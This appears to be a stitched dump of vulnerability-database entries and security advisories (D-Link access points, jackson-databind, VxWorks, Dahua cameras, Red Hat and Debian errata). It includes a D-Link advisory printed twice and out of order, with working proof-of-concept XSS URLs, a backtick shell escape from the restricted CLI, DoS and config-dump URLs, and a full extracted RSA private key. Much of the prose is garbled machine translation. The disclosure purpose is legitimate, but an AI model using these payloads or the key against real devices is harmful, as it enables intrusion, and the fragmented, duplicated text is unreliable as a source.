Proof-of concept DLINK-WLAN-AP# wget Invalid command. DLINK-WLAN-AP# `/bin/sh -c wget` BusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary. Usage: wget [-c|--continue] [-s|--spider] [-q|--quiet] [-O|--output-document FILE] [--header 'header: value'] [-Y|--proxy on/off] [-P DIR] [--no-check-certificate] [-U|--user-agent AGENT][-T SEC] URL Retrieve files via HTTP or FTP Options: -s Spider mode - only check file existence -c Continue retrieval of aborted transfer -q Quiet -P DIR Save to DIR (default .) -T SEC Network read timeout is SEC seconds -O FILE Save to FILE ('-' for stdout) -U STR Use STR for User-Agent header -Y Use proxy ('on' or 'off') DLINK-WLAN-AP# ### 5. Post-authenticated Denial of service leading to the reboot of the AP #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14335 #### Proof-of concept http://10.90.90.91/admin.cgi?action=%s ### 6. Post-authenticated Dump all the config files #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14336 #### Proof-of concept http://10.90.90.91/admin.cgi?action= ### 7. Use of weak ciphers #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14332 #### Proof-of concept root@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1 The authenticity of host '10.90.90.91 (10.90.90.91)' can't be established. RSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '10.90.90.91' (RSA) to the list of known hosts. admin@10.90.90.91's password: Enter 'help' for help. DLINK-WLAN-AP# help ## Report Timeline 22/05/2019 : This advisory is sent to D-Link - the contents of this Report will be made public within 30 days. 22/06/2019 : Public release of the security advisory to mailing list ## Fixes/Updates ftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip ftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip ## About me - pwn.sandstorm@gmail.com #### Independent EMSecurity Researcher in the field of IoT under the Sun #### Always open to hack and share #### Greetings - Ack P. Kim and others for the online resources

DrayTek routers before 2018-05-23 allow CSRF attacks to change DNS or DHCP settings, a related issue to CVE-2017-11649. DrayTek The router contains a cross-site request forgery vulnerability. This vulnerability CVE-2017-11649 Vulnerability associated with.Information may be tampered with. DrayTekrouters is a router product of DrayTek Corporation of Taiwan, China

A clone version of an ELM327 OBD2 Bluetooth device has a hardcoded PIN, leading to arbitrary commands to an OBD-II bus of a vehicle. ELM327 OBD2 Bluetooth The device contains a vulnerability related to the use of hard-coded credentials.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Elm Electronics ELM327 OBD2 Bluetooth is a Bluetooth device for scanning and reading vehicle codes from Elm Electronics Canada. A trust management issue vulnerability exists in the Elm Electronics ELM327 OBD2 Bluetooth device. This vulnerability stems from the lack of an effective trust management mechanism in network systems or products. Attackers can use default passwords or hard-coded passwords, hard-coded certificates, etc. to attack affected components

An issue was discovered on D-Link 6600-AP and DWL-3600AP Ax 4.2.0.14 21/03/2019 devices. There is post-authenticated denial of service leading to the reboot of the AP via the admin.cgi?action=%s URI. D-Link 6600-AP and DWL-3600AP The device contains an authentication vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. The D-Link 6600-AP and DWL-3600AP are both wireless access point devices from D-Link, Taiwan. There are security vulnerabilities in the D-Link 6600-AP and DWL-3600AP. An attacker could exploit the vulnerability to cause a denial of service and cause the device to reboot. # Security Advisory - 22/07/2019 ## Multiple vulnerabilities found in the D-Link 6600-AP device running the latest firmware (version 4.2.0.14). D-Link 6600-AP is not produced anymore but the support is still provided by D-Link as per described on the D-Link website. Not that this product is built for business customers of D-Link and we can expect to have thousands of devices at risk. Code base shared with DWL-3600AP and DWL-8610AP ### This advisory is sent to D-Link the 22/05/2019 Many Thanks to the D-Link Security Team for their prompt reactivity! ### Affected Product D-Link 6600-AP, DWL-3600AP + Vulnerability number 2 affects also DWL-8610AP ### Firmware version 4.2.0.14 Revision Ax date: 21/03/2019 ### Last version available https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point ### Product Identifier WLAN-EAP ### Hardware Version A2 ### Manufacturer D-LINK ## Product Description The DWL-6600AP is designed to be the best-in-class indoor Access Point for business environments. With high data transmission speeds, load balancing features, it can be deployed as a standalone wireless Access Point or used as the foundation for a managed wireless network. Source: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point ## List of Vulnerabilities 1. CVE-2019-14338 - Post-authenticated XSS 2. CVE-2019-14334 - Post-authenticated Certificate and RSA Private Key extraction through http command 3. CVE-2019-14337 - Escape shell in the restricted command line interface 5. CVE-2019-14336 - Post-authenticated Dump all the config files (post-auth) 7. CVE-2019-14332 - Use of weak ciphers for SSH ### 1. Post-authenticated XSS #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14338 #### Proof-of concept Example 1: http://10.90.90.91/admin.cgi?action=<script>alert(document.cookie)</script> Example 2: http://10.90.90.91/admin.cgi?action=+guest<script>alert('Pwned')</script> ### 2. Post-authenticated Certificate and RSA Private Key extraction through http command #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14334 #### Proof-of concept http://10.90.90.91/sslcert-get.cgi? Result of the command: File "mini_httpd.pem" automatically extracted -----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEAoGIBvZNlPN9AamssqnZj4Rmyox1t3OzN4KyAy5lI5inBHCee Hk5LPqKSS9hUn6Aia+ym6GYbYhrw2T7qSlXmdtIzqmC6ctw/1Zg/Nv7upcIj6s+o BioQrS3i++3pDqkenj7HqWb3NP7ExMmGEnzkMMVHGOkJew31VXBrI5d7INbaAg1B vsMYlUANfg96QLySyC6AwiZv55d6DpmgFzt7r8Yx6hkhZsxL9ZB4O8QnvEpjAL9t 7KUgVXtsO1FBYwp/elhK1nGtIcj1iq26G6e+vN61ePNjxIw3pwegbELrnc3b0f6c unyx9ntVNHC4yt3japRfFgxrMY4kgRgXfWej3wIDAQABAoIBAQCY25AJHPg6QhVk 1+zkMp4TJqjpad0R2OiHoCHI6rleFKGmseOzwq9YbR2+B9rvoHHuJskVamvi3wZ6 J8qpOqHC0ajIVBSf8GcurkJhqivN8/DDlVLxPRpT1A4oSqH7hRhXfkJRpH8sFT14 yRFtgXcDPKL8jO6qR61x1wlmDLQfoOPBnBjW9eDb5V5C/pNml3FgEs2XRh19py9Z 0AvKjyk/QJHRKSQ7cy2Qm5MFj9yulTFeTEVkXnPqOi8C0aZOqTFWxLi/TMUTHbsc fmDG0qkkiZMHw7K4kxWA1+ipkoBCCHjGoMrAOvyCm+MqapZQBScMMz2i13ekmADB i5Ka5fmRAoGBANT4rZONkQ/qFiPXTfwPSYCO9IPTJ+ZZQD1CbZt09r2HpN+bEfVb dAacfLWjPhG2hGlaYPDoGXqTN9llZI6qkR6TyutlOBbGG2TmR19cN60k3sgOm/eJ OztmyIWGeRsWlaP0Yvo+zySSzWOm1HdK0gLL+aJKd7/q9rtLxseCgxabAoGBAMDJ VuqAUWeKmrgMydgTlZ0IgtgcxpCwN1Spv0ECpygVrfPp0OCx+bsdajUBL/vha5Q9 J3JmaPC3rE0mIzhH7n0jrUkhSCCTfOo7+wSZzK2q6D+CykTLfm/zobeAy/Z+k7Wr H975ALD3R+qog44sGnBnznHZkYcRxYNy2/a6t1oNAoGAPJbnIwRykbmCRP4bFKvw uF9zVxG610DrEsKUVlbnX7J4iJkgedJj5wGcRTzFCtsHPsXUsJUHsqSxjerXufLy yGU5pNCuLWR9JK6S/aFJwbusmfP2EW18aYDraXmBeOBrADMl+ZXm7rvJLSGobqvd pagMREy1Vuds/IopaldKHiMCgYAQcNs1sm2+y8Y4Dfcksz7eHnyyG3ofmreNQ9Co paZFt9uW4ojKsMLgXzjQfmJuM6IuCS0VB4DJjpBmH+t/ADtpdqJviyQQiyNrAmR8 1vTqlpmp2OiRB12oBHn1IUnDorXMF2TnagrSDLSYYXiepko27dNgSDKt9ykF9cSm fPPn/QKBgFMVmV/rBJBHZvlOy00spSpbHXRnKqh+eTchjRfsUJJIxwJ08sI94dYS okObkFKhW+Kin1IjNv5EYBJBxBi/JOPRxuyS4WwCMM++NSgqmqjPdWxhQ1lD87px bgg22CyrDBw92O4AjPIln+OvdDCKgkwhQPFwBi5K1qKCvV08SrxY -----END RSA PRIVATE KEY----- -----BEGIN CERTIFICATE----- MIIDpTCCAo2gAwIBAgIEauy7rDANBgkqhkiG9w0BAQsFADB3MRQwEgYDVQQDEwsx MC45MC45MC45MTEVMBMGA1UEChMMRC1MaW5rIENvcnAuMRUwEwYDVQQLEwxELUxp bmsgQ29ycC4xFDASBgNVBAcTC1RhaXBlaSBDaXR5MQ4wDAYDVQQIEwVOZWlodTEL MAkGA1UEBhMCVFcwHhcNOTkxMjMxMjAwMDIxWhcNMTkxMjI2MjAwMDIxWjCBsTEU MBIGA1UEAxMLMTAuOTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjEVMBMG A1UECxMMRC1MaW5rIENvcnAuMRQwEgYDVQQHEwtUYWlwZWkgQ2l0eTEOMAwGA1UE CBMFTmVpaHUxCzAJBgNVBAYTAlRXMQswCQYDVQQGEwJUVzEUMBIGA1UEAxMLMTAu OTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjCCASIwDQYJKoZIhvcNAQEB BQADggEPADCCAQoCggEBAKBiAb2TZTzfQGprLKp2Y+EZsqMdbdzszeCsgMuZSOYp wRwnnh5OSz6ikkvYVJ+gImvspuhmG2Ia8Nk+6kpV5nbSM6pgunLcP9WYPzb+7qXC I+rPqAYqEK0t4vvt6Q6pHp4+x6lm9zT+xMTJhhJ85DDFRxjpCXsN9VVwayOXeyDW 2gINQb7DGJVADX4PekC8ksgugMImb+eXeg6ZoBc7e6/GMeoZIWbMS/WQeDvEJ7xK YwC/beylIFV7bDtRQWMKf3pYStZxrSHI9YqtuhunvrzetXjzY8SMN6cHoGxC653N 29H+nLp8sfZ7VTRwuMrd42qUXxYMazGOJIEYF31no98CAwEAATANBgkqhkiG9w0B AQsFAAOCAQEAb3SE7yOLixTbiSHvG/6QPGYYyo/Z7FcGOGya0wzw1MxG6lETYlSS 7A6Jm0b15VFuMOsDzucWNfLN8OfnImMpB9MqLhIU3gdx7yFpLw1ehXcrWK+TWqME 9SXIolyThrza9IV2I9+WKD4i7IfhIf4mm5OFyAh/vIpZQIpdjJiCOFKgCnihqYF5 beF63wqXndYsX2LkArXRhEWUmoRHQQgZoeEFTHhBYAlNbynXVkKKxTeFJZ24TDuE 45QTRcomj/vJAV94PM7cEAqUdHGM+HJxShcrODViwpSGiwiwCuuSxvo2wj3VLyef MjAqvgTdQBIKlTBaHnuQOm4FZmN6sJUEdQ== -----END CERTIFICATE----- ### 3. Escape shell in the restricted command line interface #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14337 #### Proof-of concept DLINK-WLAN-AP# wget Invalid command. DLINK-WLAN-AP# `/bin/sh -c wget` BusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary. Usage: wget [-c|--continue] [-s|--spider] [-q|--quiet] [-O|--output-document FILE] [--header 'header: value'] [-Y|--proxy on/off] [-P DIR] [--no-check-certificate] [-U|--user-agent AGENT][-T SEC] URL Retrieve files via HTTP or FTP Options: -s Spider mode - only check file existence -c Continue retrieval of aborted transfer -q Quiet -P DIR Save to DIR (default .) -T SEC Network read timeout is SEC seconds -O FILE Save to FILE ('-' for stdout) -U STR Use STR for User-Agent header -Y Use proxy ('on' or 'off') DLINK-WLAN-AP# ### 5. Post-authenticated Dump all the config files #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14336 #### Proof-of concept http://10.90.90.91/admin.cgi?action= ### 7. Use of weak ciphers #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14332 #### Proof-of concept root@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1 The authenticity of host '10.90.90.91 (10.90.90.91)' can't be established. RSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '10.90.90.91' (RSA) to the list of known hosts. admin@10.90.90.91's password: Enter 'help' for help. DLINK-WLAN-AP# help ## Report Timeline 22/05/2019 : This advisory is sent to D-Link - the contents of this Report will be made public within 30 days. 22/06/2019 : Public release of the security advisory to mailing list ## Fixes/Updates ftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip ftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip ## About me - pwn.sandstorm@gmail.com #### Independent EMSecurity Researcher in the field of IoT under the Sun #### Always open to hack and share #### Greetings - Ack P. Kim and others for the online resources

Cross-site scripting (XSS) vulnerability in min-http-server (all versions) allows an attacker with access to the server file system to execute arbitrary JavaScript code in victim's browser. min-http-server Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. Min-http-server is a lightweight http static resource server. The vulnerability stems from the lack of proper validation of client data for web applications. An attacker could exploit the vulnerability to execute client code

SMTP MITM refers to a malicious actor setting up an SMTP proxy server between the UniFi Controller version <= 5.10.21 and their actual SMTP server to record their SMTP credentials for malicious use later. UniFi Controller Contains vulnerabilities related to certificate and password management.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state

Cross-site scripting (XSS) vulnerability in http-file-server (all versions) allows an attacker with access to the server file system to execute arbitrary JavaScript code in victim's browser. http-file-server Contains a cross-site scripting vulnerability.The information may be obtained and the information may be falsified. Http-file-server is an HTTP file server. The vulnerability stems from the lack of proper validation of client data for web applications. An attacker could exploit the vulnerability to execute client code

A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x before 2.9.9.2. This occurs when Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the logback jar in the classpath. FasterXML jackson-databind Contains an information disclosure vulnerability.Information may be obtained. FasterXML Jackson is a data processing tool for Java developed by American FasterXML Company. jackson-databind is one of the components with data binding function. A security vulnerability exists in FasterXML jackson-databind 2.x versions prior to 2.9.9.2. Currently there is no information about this vulnerability, please keep an eye on CNNVD or vendor announcements. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 - ------------------------------------------------------------------------- Debian Security Advisory DSA-4542-1 security@debian.org https://www.debian.org/security/ Sebastien Delafond October 06, 2019 https://www.debian.org/security/faq - ------------------------------------------------------------------------- Package : jackson-databind CVE ID : CVE-2019-12384 CVE-2019-14439 CVE-2019-14540 CVE-2019-16335 CVE-2019-16942 CVE-2019-16943 Debian Bug : 941530 940498 933393 930750 It was discovered that jackson-databind, a Java library used to parse JSON and other data formats, did not properly validate user input before attempting deserialization. This allowed an attacker providing maliciously crafted input to perform code execution, or read arbitrary files on the server. For the oldstable distribution (stretch), these problems have been fixed in version 2.8.6-1+deb9u6. For the stable distribution (buster), these problems have been fixed in version 2.9.8-3+deb10u1. We recommend that you upgrade your jackson-databind packages. For the detailed security status of jackson-databind please refer to its security tracker page at: https://security-tracker.debian.org/tracker/jackson-databind Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/ Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE----- iQEzBAEBCgAdFiEEAqSkbVtrXP4xJMh3EL6Jg/PVnWQFAl2ZpPgACgkQEL6Jg/PV nWTg1QgArRk3fUf/k14rPha6GlJnWtRu2tZli07NzxtebAI2Ra8vKHkv1F3xSBjx tnauaRmJXonoU7t1TU51O/F7xkxX10NXym3YyrJ4+5ac6OtGmstSkMW1CmEiS8Z7 RaQQqY8GTJe5VTjiPon+lvdxyoFIDbp3nUGj8sshrULtKQX3Bjc9dotXyu0M3/7o QjsFAOLpytx/nMS1O93rqHuO381plbaAi5EYgAPv737tV8lVH3li56FYTKRMVjEg BkBpkaDGWhqoYvTu4WviyCyon0V5PgtHuD8SkN/39QqiYoDCzfa0xPjZ3a44G0kR C6qF8E4WIw465wLrRLCuuybG6/ZrzA== =Gifd -----END PGP SIGNATURE----- . The purpose of this text-only errata is to inform you about the security issues fixed in this release. Security Fix(es): * HTTP/2: flood using PING frames results in unbounded memory growth (CVE-2019-9512) * HTTP/2: flood using PRIORITY frames results in excessive resource consumption (CVE-2019-9513) * HTTP/2: flood using HEADERS frames results in unbounded memory growth (CVE-2019-9514) * HTTP/2: flood using SETTINGS frames results in unbounded memory growth (CVE-2019-9515) * HTTP/2: 0-length headers lead to denial of service (CVE-2019-9516) * HTTP/2: request for large response leads to denial of service (CVE-2019-9517) * HTTP/2: flood using empty frames results in excessive resource consumption (CVE-2019-9518) * infinispan: invokeAccessibly method from ReflectionUtil class allows to invoke private methods (CVE-2019-10174) * spring-security-core: mishandling of user passwords allows logging in with a password of NULL (CVE-2019-11272) * jackson-databind: failure to block the logback-core class from polymorphic deserialization leading to remote code execution (CVE-2019-12384) * jackson-databind: default typing mishandling leading to remote code execution (CVE-2019-14379) * xmlrpc: Deserialization of server-side exception from faultCause in XMLRPC error response (CVE-2019-17570) * js-jquery: Cross-site scripting via cross-domain ajax requests (CVE-2015-9251) * logback: Serialization vulnerability in SocketServer and ServerSocketReceiver (CVE-2017-5929) * js-jquery: XSS in responses from cross-origin ajax requests (CVE-2017-16012) * apache-commons-compress: ZipArchiveInputStream.read() fails to identify correct EOF allowing for DoS via crafted zip (CVE-2018-11771) * spring-data-api: potential information disclosure through maliciously crafted example value in ExampleMatcher (CVE-2019-3802) * undertow: leak credentials to log files UndertowLogger.REQUEST_LOGGER.undertowRequestFailed (CVE-2019-3888) * shiro: Cookie padding oracle vulnerability with default configuration (CVE-2019-12422) * jackson-databind: polymorphic typing issue allows attacker to read arbitrary local files on the server via crafted JSON message. Installation instructions are available from the Fuse 7.6.0 product documentation page: https://access.redhat.com/documentation/en-us/red_hat_fuse/7.6/ 4. Bugs fixed (https://bugzilla.redhat.com/): 1399546 - CVE-2015-9251 js-jquery: Cross-site scripting via cross-domain ajax requests 1432858 - CVE-2017-5929 logback: Serialization vulnerability in SocketServer and ServerSocketReceiver 1591854 - CVE-2017-16012 js-jquery: XSS in responses from cross-origin ajax requests 1618573 - CVE-2018-11771 apache-commons-compress: ZipArchiveInputStream.read() fails to identify correct EOF allowing for DoS via crafted zip 1643043 - CVE-2018-15756 springframework: DoS Attack via Range Requests 1693777 - CVE-2019-3888 undertow: leak credentials to log files UndertowLogger.REQUEST_LOGGER.undertowRequestFailed 1703469 - CVE-2019-10174 infinispan: invokeAccessibly method from ReflectionUtil class allows to invoke private methods 1709860 - CVE-2019-5427 c3p0: loading XML configuration leads to denial of service 1713068 - CVE-2019-10184 undertow: Information leak in requests for directories without trailing slashes 1725795 - CVE-2019-12814 jackson-databind: polymorphic typing issue allows attacker to read arbitrary local files on the server via crafted JSON message. 1725807 - CVE-2019-12384 jackson-databind: failure to block the logback-core class from polymorphic deserialization leading to remote code execution 1728993 - CVE-2019-11272 spring-security-core: mishandling of user passwords allows logging in with a password of NULL 1730316 - CVE-2019-3802 spring-data-api: potential information disclosure through maliciously crafted example value in ExampleMatcher 1735645 - CVE-2019-9512 HTTP/2: flood using PING frames results in unbounded memory growth 1735741 - CVE-2019-9513 HTTP/2: flood using PRIORITY frames results in excessive resource consumption 1735744 - CVE-2019-9514 HTTP/2: flood using HEADERS frames results in unbounded memory growth 1735745 - CVE-2019-9515 HTTP/2: flood using SETTINGS frames results in unbounded memory growth 1735749 - CVE-2019-9518 HTTP/2: flood using empty frames results in excessive resource consumption 1737517 - CVE-2019-14379 jackson-databind: default typing mishandling leading to remote code execution 1741864 - CVE-2019-9516 HTTP/2: 0-length headers lead to denial of service 1741868 - CVE-2019-9517 HTTP/2: request for large response leads to denial of service 1752962 - CVE-2019-14439 jackson-databind: Polymorphic typing issue related to logback/JNDI 1774726 - CVE-2019-12422 shiro: Cookie padding oracle vulnerability with default configuration 1775193 - CVE-2019-17570 xmlrpc: Deserialization of server-side exception from faultCause in XMLRPC error response 5. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ===================================================================== Red Hat Security Advisory Synopsis: Moderate: Red Hat AMQ Streams 1.3.0 release and security update Advisory ID: RHSA-2019:3200-01 Product: Red Hat JBoss AMQ Advisory URL: https://access.redhat.com/errata/RHSA-2019:3200 Issue date: 2019-10-24 Keywords: amq,messaging,integration CVE Names: CVE-2019-14439 CVE-2019-14540 CVE-2019-16335 CVE-2019-17267 ===================================================================== 1. Summary: Red Hat AMQ Streams 1.3.0 is now available from the Red Hat Customer Portal. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. 2. Description: Red Hat AMQ Streams, based on the Apache Kafka project, offers a distributed backbone that allows microservices and other applications to share data with extremely high throughput and extremely low latency. This release of Red Hat AMQ Streams 1.3.0 serves as a replacement for Red Hat AMQ Streams 1.2.0, and includes security and bug fixes, and enhancements. For further information, refer to the release notes linked to in the References section. Security Fix(es): * jackson-databind: polymorphic typing issue related to com.zaxxer.hikari.HikariConfig (CVE-2019-14540) * jackson-databind: polymorphic typing issue related to com.zaxxer.hikari.HikariDataSource (CVE-2019-16335) * jackson-databind: Polymorphic typing issue related to logback/JNDI (CVE-2019-14439) * jackson-databind: Serialization gadgets in classes of the ehcache package (CVE-2019-17267) For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section. 3. Solution: Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on. The References section of this erratum contains a download link (you must log in to download the update). 4. References: https://access.redhat.com/security/cve/CVE-2019-14439 https://access.redhat.com/security/cve/CVE-2019-14540 https://access.redhat.com/security/cve/CVE-2019-16335 https://access.redhat.com/security/cve/CVE-2019-17267 https://access.redhat.com/security/updates/classification/#moderate https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=jboss.amq.streams&downloadType=distributions&version=1.3.0 https://access.redhat.com/products/red-hat-amq#streams 6. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2019 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIVAwUBXbFsi9zjgjWX9erEAQjT6Q/+JDAvWImEvDZuahMo6spY5gcZgEn/A2KH 7JuCSBx+s0gW9NEIVp0emqW0dguTMmvQCqOhskE91kis6C9oJORlRPz7HqYaOGve 7pf0fwwQREb0VRYqXtXIYgQv+ugU+/m5bSaniSvO0S3iPLqdiANV/r7qoDqPPtOH dkVthpaYgtx7F4myG8DvVoAUzCfpxKsKdol/riYnp/rhmnEVrJAH5EuVbGtECj7p f4Qv+MSd2ebO0oDe9Lqjjv3bc7RTwdRsCZywfwHLQSC7S2vJyiXFGCtdS9fYBdgb obNjp8G+2hZ+prO0Xg+RfKeT6/3aUK5hmV/Az5Ip4AeP0a60WvBz+yhU5wd1WRX9 dxEb72pTG2r1ctHvYBTT3Qn2qB3fm0IRI9HfG7sRWtTXEGO2l9FN/zSDshockiJa jM26U3ePwqpcl6QAAe9HJBAzTcxw2Gf7ubyvmsizyueFddAmqOP+PnVqxMRntXrH A1sPw/Y06KATBUxkGpEY4KriJSiJU1Z2QmiAMlOa4Z+D5fAJh73BWZnLoYyPoLac jYg91xqmw2692d+ZAEmnBZRiWYY7IfqeesM+KzIuGYpsk2c8imXRv6/+KpqAW45l SgloiZiayL0WlYmF2+WUvhtH/lmzpfOnI96OJFruKHusAEVLgxj9kic5G02JteP+ hgNap4AeRy4= =W3XT -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce

Wind River VxWorks 6.6, 6.7, 6.8, 6.9.3, 6.9.4, and Vx7 has Incorrect Access Control in IPv4 assignment by the ipdhcpc DHCP client component. Wind River VxWorks Exists in a vulnerability in inserting or modifying arguments.Information is tampered with and service operation is interrupted (DoS) It may be in a state. Wind River Systems VxWorks is an embedded real-time operating system (RTOS) from Wind River Systems. The vulnerability stems from the process of constructing command parameters from external input data. The network system or product does not properly filter the special characters in the parameters. An attacker could exploit the vulnerability to execute an illegal command

Wind River VxWorks 6.6 through 6.9 has a Buffer Overflow in the DHCP client component. There is an IPNET security vulnerability: Heap overflow in DHCP Offer/ACK parsing inside ipdhcpc. Wind River VxWorks Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Wind River Systems VxWorks is an embedded real-time operating system (RTOS) from Wind River Systems. An attacker could exploit the vulnerability to overwrite the heap and execute code. The following products and versions are affected: Wind River Systems VxWorks Version 6.9, Version 6.8, Version 6.7, Version 6.6

The Amcrest IP2M-841B V2.520.AC00.18.R, Dahua IPC-XXBXX V2.622.0000000.9.R, Dahua IPC HX5X3X and HX4X3X V2.800.0000008.0.R, Dahua DH-IPC HX883X and DH-IPC-HX863X V2.622.0000000.7.R, Dahua DH-SD4XXXXX V2.623.0000000.7.R, Dahua DH-SD5XXXXX V2.623.0000000.1.R, Dahua DH-SD6XXXXX V2.640.0000000.2.R and V2.623.0000000.1.R, Dahua NVR5XX-4KS2 V3.216.0000006.0.R, Dahua NVR4XXX-4KS2 V3.216.0000006.0.R, and NVR2XXX-4KS2 do not require authentication to access the HTTP endpoint /videotalk. An unauthenticated, remote person can connect to this endpoint and potentionally listen to the audio of the capturing device. Amcrest IP2M-841B IP Camera firmware Contains an authentication vulnerability.Information may be obtained. The Amcrest IP2M-841B is an IP camera from Amcrest

An integer overflow in NATS Server before 2.0.2 allows a remote attacker to crash the server by sending a crafted request. If authentication is enabled, then the remote attacker must have first authenticated. NATS Server is an open source messaging system. This system is mainly used for cloud-native applications, IoT messaging, and microservice architecture. An input validation error vulnerability exists in NATS Server version 2.0.0

Wind River VxWorks has a Buffer Overflow in the TCP component (issue 1 of 4). This is a IPNET security vulnerability: TCP Urgent Pointer = 0 that leads to an integer underflow. Wind River VxWorks Exists in a buffer error vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Wind River Systems VxWorks is an embedded real-time operating system (RTOS) from Wind River Systems. An attacker could exploit the vulnerability to execute code. This vulnerability stems from the incorrect verification of data boundaries when the network system or product performs operations on the memory, resulting in incorrect read and write operations to other associated memory locations. Attackers can exploit this vulnerability to cause buffer overflow or heap overflow, etc. The following products and versions are affected: Wind River Systems VxWorks Version 6.9, Version 6.8, Version 6.7, Version 6.6. A vulnerability in Wind River VxWorks could allow an unauthenticated, remote malicious user to cause a denial of service (DoS) condition or execute arbitrary code on a targeted system. A successful exploit could allow the malicious user to execute arbitrary code or cause a DoS condition on the targeted system